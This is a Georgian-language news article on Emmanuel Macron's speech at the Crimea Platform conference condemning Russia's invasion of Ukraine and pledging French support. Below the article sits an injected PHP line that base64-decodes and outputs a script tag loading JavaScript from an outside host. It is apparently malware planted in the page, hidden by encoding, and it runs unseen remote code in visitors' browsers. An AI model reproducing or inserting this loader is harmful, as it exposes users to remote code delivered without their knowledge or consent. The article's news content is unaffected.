celsiusi
ავერსი შნაიდერი
რუსეთმა გააკეთა არჩევანი, რომ გადაეხვია საერთაშორისო პრინციპებისთვის, – ამის შესახებ საფრანგეთის პრეზიდენტმა „ყირიმის პლატფორმის“ საერთაშორისო კონფერენციაზე სიტყვით გამოსვლისას განაცხადა.
 
როგორც ემანუელ მაკრონმა აღნიშნა, 8 წლის წინ რუსეთმა დაარღვია საერთაშორისო ნორმები და საფრანგეთი მუდამ უკრაინის გვერდით დგას.
 
„ყირიმის პლატფორმის ფარგლებში ჩვენ ერთი წლის წინაც შევიკრიბეთ და დავგმეთ რუსეთის მიერ ყირიმის ანექსია. უკრაინამ აირჩია დიალოგის გზა, თუმცა, სამწუხაროდ, რუსეთმა აირჩია ომი და კიდევ ერთხელ დაარღვია ფუნდამენტური ნორმები, დაიწყო ფართომასშტაბიანი აგრესია უკრაინის წინააღმდეგ. საფრანგეთი, ევროკავშირი და უკრაინის სხვა მოკავშირეები მხარს დაუჭერენ უკრაინის თავდაცვას, რადგან ეს სამართლიანი ბრძოლაა თქვენი სუვერენიტეტისა და ტერიტორული მთლიანობისთვის. ჩვენი შემართება არ შეცვლილა. ჩვენ მზად ვართ, ეს ძალისხმევა გრძელვადიანად გავაგრძელოთ“, – განაცხადა მაკრონმა.
 
მისივე თქმით, უკრაინაში მიმდინარე ომი ეხება არა მხოლოდ უკრაინელ ხალხს, არამედ ეს არის ბრძოლა საერთაშორისო წესრიგის დასაცავად.
 
„ომი დაიწყო რუსეთის მიერ საერთაშორისო ნორმების ფუნდამენტური პრინციპების დარღვევით. ის, რაც ხდება დღეს, არ არის მხოლოდ და მხოლოდ ომი ევროპის ტერიტორიაზე, არამედ ეს ეხება უნივერსალურ პრინციპებს და შესაძლებელობას, ვიცხოვროთ მშვიდად და პატივი ვცეთ ტერიტორიული მთლიანობისა და სუვერენიტეტის პრინციპებს, რაც წარმოადგენს საერთაშორისო წესრიგის ფუნდამენტს. რუსეთმა გააკეთა არჩევნი, რომ გადაეხვია ამ პრინციპებისთვის. ეს არის სისუსტე. მე მოვუწოდებ რუსეთს, რომ შეწყვიტოს სამხედრო ქმედებები და გაიყვანოს სამხედროები უკრაინის ტერიტორიიდან, გამოიყენოს დიპლომატიის ყველა ფორმა, რომ უკრაინის ტერიტორია და მომავალი დაცული იყოს. ბოლო პერიოდში ჩვენ ვნახეთ, რომ ომი ეხება ასევე ყირიმსაც, ისევე როგორც უკრაინის იმ ტერიტორიას, სადაც ომი ბოლო 6 თვეა, გრძელდება“, – განაცხადა მაკრონმა.
467
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");